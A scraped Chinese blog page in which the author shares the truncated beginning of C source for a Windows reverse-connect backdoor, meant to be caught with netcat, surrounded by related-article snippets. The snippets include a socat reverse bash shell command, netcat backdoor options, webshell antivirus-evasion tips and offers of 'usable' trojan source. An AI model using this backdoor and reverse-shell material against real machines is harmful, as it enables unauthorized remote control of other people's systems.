反向连接后门的使用

最新推荐文章于 2022-08-25 22:41:12 发布
最新推荐文章于 2022-08-25 22:41:12 发布
阅读量1.4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 编程 文章标签: socket null attributes buffer security cmd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/djyangmaowei/article/details/2493206

这是一个反向连接的源程序 通过对这个程序的研究我可以知道一个cmd shell是怎么建立并实现的

这是一个单管道的程序 为此我还专门看了一下书中所讲的零管道和双管道

用瑞士军刀进行监听 最后得到一个cmd shell

是不是溢出攻击也是要用到这个哟 嘿嘿 幻想...

 

#include<winsock2.h>
#include<stdio.h>

#pragma comment(lib,"ws2_32.lib")

void main(int argc,char **argv)
{
char *messages = "/r/n======================== BackConnect BackDoor V0.1 ========================/r/n========= Welcome to Http://www.nohack.cn =========/r/n";
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char buf1[1024];   //作为socket接收数据的缓冲区
memset(buf1,0,1024);   //清空缓冲区
 
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
   {
     printf("WSAStartup error.Error:d/n",WSAGetLastError());
     return;
   }

   addr_in.sin_family=AF_INET;
   addr_i

最低0.47元/天 解锁文章

200万优质内容无限畅学
经典反向后门源代码(可用)vc++6.0反弹木马
12-14
经典反向后门源代码(可用)vc++6.0反弹木马
windows后门程序windows后门程序
02-02
windows后门程序windows后门程序wiwindows后门程序ndows后门程序
基于visual c++之windows核心编程代码分析(41)实现反向连接后门
weixin_30731305的博客
01-23 156
随着安全事件的不断涌现,人们的主机防护意识越来越强,各种各样的防火墙和反病毒软件都开始对来自外部的网络连接进行监控,所以传统的采用正向连接的木马已经不再适应现在的网络环境了。为了能够继续进行远程控制,木马不得不从体制上进行改变,这就出现了采用反向连接技术的。“反弹型”木马。“反弹”木马现在已经见得比较多了,但是对其技术细节介绍的文章还是比较少。为了监控危害我们伟大祖国的间谍分子,我们需要实现...
反向链接--后门
zsms1314的博客
02-28 1475
1,安装socat库 (centos) yum install socat http://www.dest-unreach.org/socat/download/ socat库下载地址 2,安装方式 ./configure make make install 3,使用方式 server端 socat file:tty,raw,echo=0 tcp-listen:5081 client端 socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:xx.xx
黑客编程技术--反向后门连接的实现
Jesus in my place
02-05 3159
      大过年的,一早收到第一封rejection from CS U-Washington Seattle,郁闷。估计明天起还有一批rej要来,何时有offer啊!淡定淡定,要让自己变强大!恩恩!学习去!      反向后门连接,就是把后门程序植入到服务器上,由服务器主动发起对hacker的连接,由此hacker可以突破网络的访问障碍与server通信,并通过后门获取服务器信息。实验环境:server:windows 7 professional edition + vc6.0            
安全之路 —— 零管道反向连接后门解析
雨者
03-05 1787
简介 根据前面两篇Blog介绍的双管道后门和单管道后门,他们的特点是一定需要建立管道以便进行进程间通信。但是能不能不需要管道呢?答案是可以的,这里需要借鉴重叠IO的思想,将程序中的socket函数替换成支持重叠IO的WSASocket函数。 核心知识点 si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock; 即将Socket...
反向连接后门源码
JAVA天地
05-21 244
#include&lt;winsock2.h&gt;#include&lt;stdio.h&gt;#pragmacomment(lib,"ws2_32.lib")voidmain(intargc,char**argv){char*messages=" ========================BackConnectBackDoorV0.1========================...
1k(程序体积1kb) 反向连接,零管道后门
古剑楠的专栏
09-23 968
1k(程序体积1kb) 反向连接,零管道后门(转)   [ 日期: 2006-05-17 01:06 | 作者: d99 | 来自: 转 | | ]   写ShellCode的时候写的~C版本代码~~没用就丢出来了~CODE:/*  1k(程
1k(程序体积1kb) 反向连接,零管道后门(转)
yingfox的专栏
11-29 887
导读:   写ShellCode的时候写的~C版本代码~~没用就丢出来了~   CODE:   /*   1k(程序体积1kb) 反向连接,零管道后门 By Anskya   说明:   不用我多说了吧..黑客一般都会使用后门程序..   这里只是简单的演示一下..没有添加进程隐藏功能   程序可以在Win9x,Win2k,WinXP,Win2k3上使用   程序体积只有1k(FSG压缩
安全之路 —— 单管道反向连接后门解析
雨者
03-04 676
原理简述 单管道后门相对于双管道后门(参照前面发的Blog),很明显单管道后门使用了“cmd.exe /c [命令]”的用法在进行cmd进程创建时就顺带执行了命令,所以省去了由socket发往cmd的管道。同时笔者为样例程序加上了反向连接的模块,反向连接由宿主机作为client端,操纵者的nc或telnet等作为server端,与前面发的正向连接原理相反,反向连接由宿主机发出连接,可以有效...
如何基于Python写一个TCP反向连接后门
qq_43743562的博客
02-06 3432
0x0 介绍 在Linux系统做未授权测试,我们须准备一个安全的渗透环境,通常第一件事就是安装虚拟机。且在攻击阶段中还需要对受害系统进行控制。常见的后门大多数是利用Metasploit生成,而目前反病毒产品遇到Metasploit文件签名的程序就会添加特征库作为查杀对象,所以开发出自己的后门程序非常必要。 这篇文章将介绍如何写一个具有反向连接功能的后门反向连接:通常的网络连接程序是由客户端通过服务器开放的...
python反向连接
时光凉春衫薄的博客
10-17 548
&#13; https://blog.youkuaiyun.com/u010726042/article/details/73565068&#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13;
反向链接的类型(转)
cuankuangzhong6373的博客
01-29 446
综观各类网站,其反向链接的类型不外乎以下几种: (1)站内链接:分为两种,一种是实际存在的,而另一种是虚拟存在的;一种是为浏览者设计的,而另一种是专为搜索引擎设计的。 (2)镜象站的链接:分为两种,一种是有国际域名的镜象站,而另...
nc——制作后门连接与反弹shell连接使用
1stPeak's Blog
04-18 4265
一、nc参数 -g<网关> 设置路由器跃程通信网关,最多可设置8个 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数 -h 在线帮助 -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口 -l 使用监听模式,管控传入的资料 -n 直接使用IP地址,而不通过域名服务器。 -o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒...
关于电脑(window)后门查看的一些总结
weixin_33830216的博客
01-24 2226
由于贫穷,所以一直使用盗版软件,尽管盗版软件的源还是一些正规的网站,但是自己有涉猎一些网络安全,一直害怕被留后门之类的。所以专门去问了一下一些大佬,现在做一些总结: 如果是发在社交网站的软件,一般要留后门的话,是利用域名动态绑定ip,所以这个时候检测后门的手法大概有这么两个有效的方法:1.记录电脑的dns解析Log,因为域名一直在变,后门不断请求,dns记录会打出很多。 具体可以使用下面的...
五大后门连接工具&木马免杀初级思路
weixin_54882883的博客
08-25 1493
在我们上传木马的时候,经常会遇到木马查杀,木马上传上去了突然被杀了删除了,有时候木马上传了,但是连不上去,这是在getshell中经常遇到的问题,那么当遇到这种问题,就需要让木马绕过网站上WAF的一些查杀等等问题了。那么这个时候POST还需将我们要执行的代码命令等等进去传送给assert函数。但是eval不能直接在URL中添加所以用assert来代替。其实assert和eval的功能上是差不多。检测机制检测就是未知代码不知道。为什么e=assert呢。那么这个地址就是后门地址。加密其实就是把木马加密了。..
windows下后门技术(netcat篇)
热门推荐
d_0xff的博客
05-25 1万+
由于这次ctf的失利,来补习一下知识吧!windows下后门环境 win7 nc.exe假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题便携式工具(Portable Applications)便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值